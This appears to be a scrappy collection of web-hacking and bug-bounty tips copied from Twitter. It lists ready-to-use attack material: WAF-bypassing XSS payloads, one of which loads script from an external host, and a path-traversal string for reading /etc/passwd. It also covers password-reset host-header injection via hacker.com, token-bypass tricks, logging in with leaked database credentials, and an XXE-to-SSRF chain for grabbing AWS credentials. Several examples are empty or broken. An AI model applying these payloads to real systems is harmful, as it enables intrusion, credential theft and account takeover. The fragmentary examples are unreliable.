Below are twitter handles


Webarchive > internet.domain.com > dirsearch > found .git/index file used gin to read the index file

pip3 intall gin 
gin  <index file
found .env file

opened > full of credentials access to their mysql database

connect using:

mysql -u username -p -h <ip/host> 
password: <password>


amass enum -d target.com -passive -o s3subs.txt 
s3scanner s3sbus.txt

Might find hidden misconfigured S3 Buckets, if have write permissions, you can takeover the bucket and report as High/P2

Twitter - PhpMyAdmin Account Takeover

1. Found a Wordpress Website with Search Parameter

2. Got an Easy SS on the same parameter

3. While looking for making more impact with XSS, Application Crached Unexpectedly.

4. Error Message REvealed “Database Connection String” revealing the DB name, Username, Password, etc

5. Did some more research, directory brute force got me “phymyadmin” directory in /c/soft/phpmyadmin.

6. Used the credentials revealed from "Connection String and Looged in Succefully.


  • If you get XSS on Wordpress, try some random other payloads.

  • Application's logic may break and reveal internal information.

  • Recon, Recon & Recon to see the use of the information


“Jenkinsfile” can give you passwords from Jenkins instance. Add this to your wordlist



Firefox is the only browser which allows self closing script.


XXE by injected METADATA in Image bytes → Blind SSRF via local dtd → grabbed AWS EC2 credentials blindly → Powned


Bypass F5-Big WAF with XSS payload

Interesting is %5k converted to “P” characted


"><P/onweel=alert(1)>mouse wheel here<!-- Injected Payload %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--


Easy Automation XSS Tip

cat subdomain.txt | waybackurls >> wayback.txt 
cat subdomain.txt | hakrawler -depth 3 -plain >> spider.txt 
cat spider.txt wayback.txt | kxss
Hakrawler by @hakluke 
Waybackurl, kxss by @TomNomNom
Recommended dalfo instead of kxss 
cat spider.txt | grep “=” | dafox pipe 
dalfox by @hahwul


Use ffuf for vhosting on every new domain to find hidden servers/admin panels:

fuf -c -u https://target.com -H “Host: FUZZ” -w vhost_wordlist.txt 

Pro-tip: do both “Hosts: FUZZ” and “Host: FULL.target.com”


Fuzzing list to FIND SSRF

<=== PHP cve2020


Just found and triaged private program for bypass HTTP auth. CHange Method from GET to POST

GET /oauth2login got http auth 
POST /oauth2login/index/ bypassed to internal panel


Testing Password REset Functionalities:

1) Include your mail as a second parameter (you might receive the reset link):

POST /reset 

2) Brute force reset token if it is numeric. YOu can use IP Rotator on Burpsuite to bypass rate limit in case it's IP baed:

POST /reset 

3) Try to use reset token on target's account:

POST /reset 

4) Host header injection : change website.com to hacker.com (victim might receive the reset link with your host instead of the original website's)

POST /reset 
Host: hacker.com 

5) Try to figure out how the tokens are generated. Example can be:

-Generate based on TimeStamp

-Generate based on the ID of the user

-Generate based on the email of the user


1- Completely remove the token

2- change it to 000000000000

3- use null/nil value

4- try expired token

5- try an array of old tokens

6- look for race conditions

7- change 1 char at the begin/end to see if the token is evaluated

8- use unicode char jutzu to spoof email address

9- try victim@email.com&attacker@email.com use %20 or | as a seperators

10- try to register the same mail with different tld .eu.net,etc

11- don't add the domain locu@

12- try sqli bypass and wildcard or, %, *

13- request smuggler

14- change request method (get,put,post,etc) and/or content type (xml<>json)

15- match ba response and replace with good one 16- use super long string


with CLRF /resetPassword?0a%0dHost:atracker.tld (x-host,true-client-ip,x-forwarded...)

@11xuxx credit to @joohoi

Using ffuf right way and gaining admina ccess

1. “ffuf -u ... --mc all” -> match all responses codes

2. ctrl+c after 5 sec

3. "ffuf -u ... --mc all -fw ...

4. found a backdoor developer used to login as admin (response code 404)


Filter bypass

<style/><img src="z'z</style><script/z>alert(1)</script>">
<script/z> can lead external js:
<script/z src=//external.com/1.js>


Bootsrap payload bypassing WAF filters

<Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm) (1)>'>


Got a SSRF inside a company ASN?

Not Cloud metadata endpoint to hit?

Don't forget to scan for internal hosts and try sqlmap

sqlmap via ssrf!


Arbitrary file read

![a](/uploads/1111111111111111111111111111111111111111111111111/ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../ ../etc/passwd)

Last updated